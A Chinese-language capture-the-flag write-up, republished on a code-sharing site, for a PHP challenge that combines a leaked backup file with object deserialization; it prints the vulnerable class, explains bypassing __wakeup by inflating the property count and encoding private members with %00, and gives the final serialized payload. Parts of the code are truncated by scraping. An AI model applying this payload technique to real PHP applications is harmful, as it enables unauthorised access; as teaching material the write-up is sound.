当前位置:首页 > 编程语言 > [极客大挑战]PHP——目录泄露+反序列化

[极客大挑战]PHP——目录泄露+反序列化

2021-03-31 19:25

阅读:367

标签:new   设置   显示   hello   hack   析构函数   image   分析   简单   

考点:目录泄露+PHP反序列化

题目一览

拿到题目,前端是个逗猫游戏

技术图片

源码也没什么东西,先dirsearch跑一遍,这里设置下delay,防止频率过快被报429:

技术图片

发现备份文件,打开发现源码:

技术图片

分析

index.php

class.php:

?php
include ‘flag.php‘;


error_reporting(0);


class Name{
    private $username = ‘nonono‘;
    private $password = ‘yesyes‘;

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = ‘guest‘;
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "NO!!!hacker!!!";
            echo "You name is: ";
            echo $this->username;echo "";
            echo "You password is: ";
            echo $this->password;echo "";
            die();
        }
        if ($this->username === ‘admin‘) {
            global $flag;
            echo $flag;
        }else{
            echo "hello my friend~~sorry i can‘t give you the flag!";
            die();

            
        }
    }
}
?>

flag.php里面是个假flag。

从index.php不难看出是个反序列化题目,我们直接分析class.php:

类名:name

成员变量:private的$username $password

__construct:类的构造函数

__wakeup:一个类反序列化时,调用该函数。会把username变成guest

__destruct:析构函数。类销毁的时候执行,只有username为admin,password为100时候,输出flag

绕过__wakeup方法很简单:序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过wakeup的执行

username = $username;
        $this->password = $password;
    }
}

$a = new Name();
echo serialize($a);
?>

得到:

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;}

在改对象个数之前,可以发现一个问题:Nameusername是12个字符,为什么显示14个?

见下例:

输出为:

O:4:"test":3:{s:11:"testtest1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:"*test3";s:5:"hello";}

如果我们抓包的话,可以看到如下结果:

{s:11:"%00test%00test1";s:5:"hello";s:5:"test2";s:5:"hello";s:8:"%00*%00test3";s:5:"hello";}

private的成员变量被反序列化后变成 %00test%00test1

public的成员变量不变,仍为test2

protected的成员变量变成 %00*%00test3

这就是为什么我们的payload变成了14,因为多的2个字符为%00,为不可打印字符,所以不显示。

最终payload

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

最后别忘了传一个select参数:

技术图片

[极客大挑战]PHP——目录泄露+反序列化

标签:new   设置   显示   hello   hack   析构函数   image   分析   简单   

原文地址:https://www.cnblogs.com/keelongz/p/12580444.html

上一篇:JS+PHP实现登录后自动执行之前的操作

下一篇:Xpath定位与Css定位

文章来自:搜素材网编程语言模块,转载请注明文章出处。
文章标题:[极客大挑战]PHP——目录泄露+反序列化
文章链接:http://soscw.com/index.php/essay/70587.html

评论

亲,登录后才可以留言!

热门文章

推荐文章

最新文章

置顶文章

关于我们 | 版权声明 | 常见问题 | 素材投稿 | 联系我们 | 网站地图 |
搜素材网素材除本站原创外均由用户分享,若发现权利被侵害,请联系及时联系我们,我们会在第一时间进行处理。
特别说明:本站所有资源除本站原创外仅供学习与参考,请勿用于商业用途,如有侵犯您的版权请联系客服服务QQ:点击这里给我发消息
Copyright © 2024 soscw.com 搜素材网素材网版权所有 蜀ICP备18015633号-1